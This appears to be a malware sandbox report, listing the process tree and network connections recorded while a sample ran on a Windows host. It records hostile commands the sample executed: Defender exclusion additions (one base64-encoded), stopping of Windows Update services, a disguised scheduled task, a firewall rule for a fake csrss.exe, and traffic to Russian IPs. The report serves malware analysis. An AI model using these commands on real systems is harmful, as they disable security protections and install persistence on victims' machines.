"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,4219469405257606188,1988454598763064376,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,9882785725250652790,841354470109751662,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,9882785725250652790,841354470109751662,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,10010837553238454039,2829693857467305620,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,8470878042280355721,5481356603657520018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6584 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 8632 -ip 8632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8632 -s 540
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Jh0bl33.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Jh0bl33.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7852 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8116 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\F9AD.exe
C:\Users\Admin\AppData\Local\Temp\F9AD.exe
C:\Users\Admin\AppData\Local\Temp\FA89.exe
C:\Users\Admin\AppData\Local\Temp\FA89.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6692 -ip 6692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6692 -s 784
C:\Users\Admin\AppData\Local\Temp\214C.exe
C:\Users\Admin\AppData\Local\Temp\214C.exe
C:\Users\Admin\AppData\Local\Temp\2479.exe
C:\Users\Admin\AppData\Local\Temp\2479.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\26CC.exe
C:\Users\Admin\AppData\Local\Temp\26CC.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\2479.exe
C:\Users\Admin\AppData\Local\Temp\2479.exe
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Roaming\Tags\Settings.exe
C:\Users\Admin\AppData\Roaming\Tags\Settings.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3132 /prefetch:2
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\E2BA.exe
C:\Users\Admin\AppData\Local\Temp\E2BA.exe
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store.steampowered.com | udp |
| US | 8.8.8.8:53 | www.epicgames.com | udp |
| US | 8.8.8.8:53 | www.paypal.com | udp |
| NL | 104.85.0.101:443 | store.steampowered.com | tcp |
| US | 8.8.8.8:53 | 101.0.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 52.2.199.143:443 | www.epicgames.com | tcp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 8.8.8.8:53 | twitter.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 141.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.199.2.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.49.222.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.1.101.151.in-addr.arpa | udp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 35.247.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.39.65.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 100.39.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pbs.twimg.com | udp |
| US | 8.8.8.8:53 | api.twitter.com | udp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 104.244.42.194:443 | api.twitter.com | tcp |
| US | 8.8.8.8:53 | video.twimg.com | udp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 192.229.220.133:443 | video.twimg.com | tcp |
| US | 192.229.233.50:443 | pbs.twimg.com | tcp |
| US | 104.244.42.69:443 | t.co | tcp |
| US | 8.8.8.8:53 | 194.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.21.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.220.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.233.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.ads-twitter.com | udp |
| NL | 199.232.148.157:443 | static.ads-twitter.com | tcp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| NL | 142.250.179.182:443 | i.ytimg.com | tcp |
| US | 157.240.5.10:443 | static.xx.fbcdn.net | tcp |
| US | 157.240.5.10:443 | static.xx.fbcdn.net | tcp |
| US | 157.240.5.10:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | 157.148.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.5.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | community.akamai.steamstatic.com | udp |
| NL | 23.72.252.169:443 | community.akamai.steamstatic.com | tcp |
| NL | 23.72.252.169:443 | community.akamai.steamstatic.com | tcp |
| NL | 23.72.252.169:443 | community.akamai.steamstatic.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.72.252.171:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 106.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static-assets-prod.unrealengine.com | udp |
| US | 8.8.8.8:53 | tracking.epicgames.com | udp |
| US | 18.239.36.22:443 | static-assets-prod.unrealengine.com | tcp |
| US | 54.205.234.65:443 | tracking.epicgames.com | tcp |
| US | 8.8.8.8:53 | 22.36.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.234.205.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.paypalobjects.com | udp |
| US | 151.101.2.133:443 | www.paypalobjects.com | tcp |
| US | 8.8.8.8:53 | store.akamai.steamstatic.com | udp |
| NL | 23.72.252.176:443 | store.akamai.steamstatic.com | tcp |
| NL | 23.72.252.176:443 | store.akamai.steamstatic.com | tcp |
| NL | 23.72.252.176:443 | store.akamai.steamstatic.com | tcp |
| US | 8.8.8.8:53 | 176.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.2.101.151.in-addr.arpa | udp |
| US | 151.101.2.133:443 | www.paypalobjects.com | tcp |
| RU | 5.42.92.51:19057 | tcp | |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| NL | 172.217.168.227:443 | www.recaptcha.net | tcp |
| US | 8.8.8.8:53 | c.paypal.com | udp |
| US | 8.8.8.8:53 | facebook.com | udp |
| US | 157.240.5.35:443 | facebook.com | tcp |
| US | 8.8.8.8:53 | 35.5.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fbcdn.net | udp |
| US | 157.240.5.35:443 | fbcdn.net | tcp |
| US | 192.55.233.1:443 | tcp | |
| US | 8.8.8.8:53 | t.paypal.com | udp |
| US | 151.101.1.35:443 | t.paypal.com | tcp |
| US | 192.55.233.1:443 | tcp | |
| NL | 172.217.168.227:443 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | fbsbx.com | udp |
| US | 8.8.8.8:53 | 35.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | b.stats.paypal.com | udp |
| US | 64.4.245.84:443 | b.stats.paypal.com | tcp |
| US | 8.8.8.8:53 | dub.stats.paypal.com | udp |
| US | 64.4.245.84:443 | dub.stats.paypal.com | tcp |
| US | 8.8.8.8:53 | 84.245.4.64.in-addr.arpa | udp |
| RU | 5.42.92.190:80 | 5.42.92.190 | tcp |
| US | 194.49.94.72:80 | tcp | |
| NL | 23.72.252.169:443 | community.akamai.steamstatic.com | tcp |
| NL | 23.72.252.169:443 | community.akamai.steamstatic.com | tcp |
| NL | 23.72.252.169:443 | community.akamai.steamstatic.com | tcp |
| US | 8.8.8.8:53 | 190.92.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c6.paypal.com | udp |
| US | 151.101.1.35:443 | c6.paypal.com | tcp |
| NL | 23.72.252.176:443 | store.akamai.steamstatic.com | tcp |
| NL | 23.72.252.176:443 | store.akamai.steamstatic.com | tcp |
| NL | 23.72.252.176:443 | store.akamai.steamstatic.com | tcp |
| US | 18.239.36.22:443 | static-assets-prod.unrealengine.com | tcp |
| US | 8.8.8.8:53 | login.steampowered.com | udp |
| NL | 23.222.49.98:443 | login.steampowered.com | tcp |
| US | 8.8.8.8:53 | sentry.io | udp |
| US | 35.186.247.156:443 | sentry.io | tcp |
| US | 8.8.8.8:53 | api.steampowered.com | udp |
| NL | 23.222.49.98:443 | api.steampowered.com | tcp |
| US | 8.8.8.8:53 | 156.247.186.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | talon-website-prod.ecosec.on.epicgames.com | udp |
| US | 104.18.41.136:443 | talon-website-prod.ecosec.on.epicgames.com | tcp |
| US | 8.8.8.8:53 | 136.41.18.104.in-addr.arpa | udp |
| US | 104.244.42.194:443 | api.twitter.com | tcp |
| US | 8.8.8.8:53 | talon-service-prod.ecosec.on.epicgames.com | udp |
| US | 172.64.146.120:443 | talon-service-prod.ecosec.on.epicgames.com | tcp |
| US | 172.64.146.120:443 | talon-service-prod.ecosec.on.epicgames.com | tcp |
| US | 8.8.8.8:53 | 120.146.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | js.hcaptcha.com | udp |
| US | 104.19.219.90:443 | js.hcaptcha.com | tcp |
| US | 8.8.8.8:53 | 90.219.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| NL | 142.251.39.98:443 | googleads.g.doubleclick.net | tcp |
| NL | 142.251.39.98:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | newassets.hcaptcha.com | udp |
| US | 8.8.8.8:53 | 98.39.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.hcaptcha.com | udp |
